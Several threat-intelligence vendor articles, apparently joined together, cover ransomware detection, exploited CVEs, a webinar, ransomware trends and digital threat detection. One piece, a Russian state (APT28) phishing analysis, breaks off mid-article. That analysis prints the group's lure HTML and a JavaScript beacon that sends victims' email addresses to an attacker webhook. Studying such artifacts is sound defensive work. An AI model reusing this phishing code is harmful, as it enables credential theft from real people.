• Pre-encryption visibility: Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.
• Context-rich alerts: Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.
• Integration maturity: Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.
• Operational efficiency: Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.
• Relevance: Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.
• Scalability: Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.

How Recorded Future Enables Early Ransomware Detection

The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing alert fatigue draining analyst time on false positives instead of credible threats.

Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.

Real-Time Relevance Through SecOps Intelligence

Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.

Proactive Mitigation Through Vulnerability Intelligence

Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.

The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.

Victimology and Anticipation

Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.

This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.

Shifting From Reactive Response to Intelligence-Led Prevention

No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.

Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.

December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.

What security teams need to know:

• React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
• China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
• Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines
• Legacy vulnerabilities resurface: CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps

Bottom line: December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.

Quick Reference Table

All 22 vulnerabilities below were actively exploited in December 2025.

Table 1: List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)

Key Trends in December 2025

Affected Vendors

• Fortinet continued vulnerability concerns with two critical authentication bypass flaws
• Google faced three vulnerabilities across Android (2) and Chromium (1) platforms
• Microsoft dealt with a Windows kernel use-after-free vulnerability
• Meta experienced the month's most impactful vulnerability with React2Shell
• Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC

Most Common Weakness Types

• CWE-22 – Path Traversal
• CWE-347 – Improper Verification of Cryptographic Signature
• CWE-416 – Use After Free
• CWE-434 – Unrestricted Upload of File with Dangerous Type
• CWE-787 – Out-of-bounds Write

Threat Actor Activity

React2Shell exploitation dominated December’s CVE activity:

• Threat actors observed to have exploited this vulnerability:
  • China-nexus actors Earth Lamia and Jackpot Panda
  • China-linked clusters UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595
  • North Korea-linked and financially motivated groups
• Observed payloads included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)
• Infrastructure connections to HiddenOrbit relay infrastructure and GobRAT relay component

Additional activity:

• UAT-9686 exploited Cisco Secure Email Gateway (CVE-2025-20393), deploying AquaShell, AquaPurge, and AquaTunnel
• Unknown actors leveraged Gogs vulnerability (CVE-2025-8110) for Supershell malware deployment

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed widespread exploitation.

CVE-2025-55182 | Meta React Server Components (React2Shell)

Risk Score: 99 (Very Critical) | CISA KEV: Added December 5, 2025

Why this matters: Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.

Affected versions:

• React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)
• Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77
• Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin

Immediate actions:

• Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately
• Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5
• Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints
• Check logs for E{"digest" error patterns indicating exploitation attempts
• Review server processes for unexpected Node.js child processes

Exposure: ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)

Figure 1: Vulnerability Intelligence Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)

CVE-2025-20393 | Cisco Secure Email Gateway

Risk Score: 99 (Very Critical) | Active exploitation by UAT-9686

Why this matters: Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.

Affected products: Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS

Immediate actions:

• Apply Cisco's security updates immediately
• Monitor Spam Quarantine web interface access logs
• Check for modifications to /data/web/euq_webui/htdocs/index.py
• Hunt for AquaShell, AquaPurge, and AquaTunnel indicators
• Review outbound connections to suspicious IPs

Known C2 infrastructure: 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)

Key Takeaways

• Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
• Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
• Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
• AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.

Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.

Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.

But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.

Intelligence as a strategic asset

Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”

Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”

Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”

How threat intelligence delivers organization-wide value

Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.

Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”

Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”

Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”

The anatomy of a mature threat intelligence program

According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.

“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.

Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”

Pathways to advancing maturity

Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”

Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”

Top challenges for CTI teams

The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”

Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.

Looking to the future of threat intelligence

When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.

Watch the recordings of the North America and EMEA webinar sessions to learn more, and download the 2025 State of Threat Intelligence Report to see how your peers are evaluating, investing in, and operationalizing threat intelligence.

The analysis cut-off date for this report was September 11, 2025

Executive Summary

Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report.

Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.

BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.

BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.

Key Findings

• BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.
• The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.
• Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.
• BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.
• Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.

Microsoft OWA Credential Harvesting

On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in Figure 1.

Figure 1: OWA login-themed credential-harvesting page (Source: Recorded Future)

BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL hxxps://shorturl[.]at/Be4Xe. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.

The initial webhook in this campaign differs from those previously reported by Inskit Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per Figure 2.

<html>
  <head>
    <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width">
        <meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4">
  </head>
  <body>
    <object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"></object>
  </body>
</html>

Figure 2: HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)

The PDF lure document, shown in Figure 3, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”

Figure 3: Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)

After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, which hosts a spoofed OWA login page as shown in Figure 1. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.

As shown in Figure 4, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in Figure 5, and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.

Figure 4: Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)

<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script>

Figure 5: JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)

The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “u=” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to /owa/ to imitate a legitimate OWA login page.

When the HTML form is submitted, a JavaScript function named myFunction captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in Figure 6.

Key Takeaways

• Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
• Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
• Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.

The ransomware paradox: More attacks, less money

By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.

For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.

This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.

Trend 1: DDoS services return to the RaaS model

With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.

The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.

• What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.

Trend 2: Insider recruitment attempts are accelerating

Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.

The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.

• What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.

Trend 3: Gig workers as unwitting attack vectors

According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.

The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.

• What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.

Looking ahead: One big prediction for 2026

The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.

Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.

The bottom line: Strengthen your ransomware defenses

Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:

• Explore Recorded Future's Ransomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
• Read our latest Insikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
• Download the Proactive Ransomware Mitigation eBook for actionable strategies to identify, investigate, and prioritize cyber threats.

Key Takeaways

• Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
• Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
• Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
• Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
• Recorded Future operationalizes intelligence at enterprise scale. The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.

Why Digital Threat Detection Requires a New Approach

Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:

• High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
• Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
• Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
• Alert fatigue from manually sifting through noise to find high-risk signals.

As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.

Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.

The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.

Understanding the Modern Digital Threat Landscape

To build an effective digital threat detection program, security teams must understand where modern threats originate and how attackers operate.

Key Threat Vectors Beyond the Perimeter

Leaked credentials and account takeover attempts (stolen identities)

Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.

Brand impersonation, domain spoofing, and phishing campaigns

Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.

Vulnerability exploitation and zero-day threats in the external attack surface

Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.

Dark web chatter and early warning signs of planned ransomware or DDoS attacks

Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.

Why an Intelligence-Driven Approach is Better

For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.

Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.

The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.

Essential Digital Threat Detection Tools and Technologies

Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.

Threat Intelligence Platforms: The Engines of Context

No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.

Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:

• Open web reporting
• Underground forums
• Dark web marketplaces
• Malware sandboxes
• Threat feeds
• Researcher data

Once the data is normalized, the platform enriches it with context, such as:

• Relationships between indicators
• Associations with known threat actors
• Infrastructure reuse
• Activity targeting specific industries or regions

This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.

Security Orchestration, Automation, and Response (SOAR)

While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.

Key SOAR capabilities include:

• Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
• Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
• Initiating takedown workflows for harmful domains or impersonation infrastructure
• Coordinating actions across multiple security tools to ensure a unified response
• Documenting each step of the investigation for reporting and compliance

By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.

Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration

EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.

EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.

Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.

Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.

Overcoming the Analyst’s Biggest Pain Points

Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.

The Drain of Alert Fatigue and False Positives

High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.

The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.

The Blind Spots of External Risk

Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.

These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.

Recorded Future: Operationalizing Digital Threat Intelligence at Scale

Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.

Real-Time Context from the Intelligence GraphⓇ

The Intelligence GraphⓇ addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:

• Open web
• Dark web marketplaces
• Malware repositories
• Technical feeds
• Network telemetry
• Closed underground forums

No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.

Comprehensive Digital Risk Protection for External Threats

Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.

Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.

Accelerating Time-to-Action through Integrated Intelligence

Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.

An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.

Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.

This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.

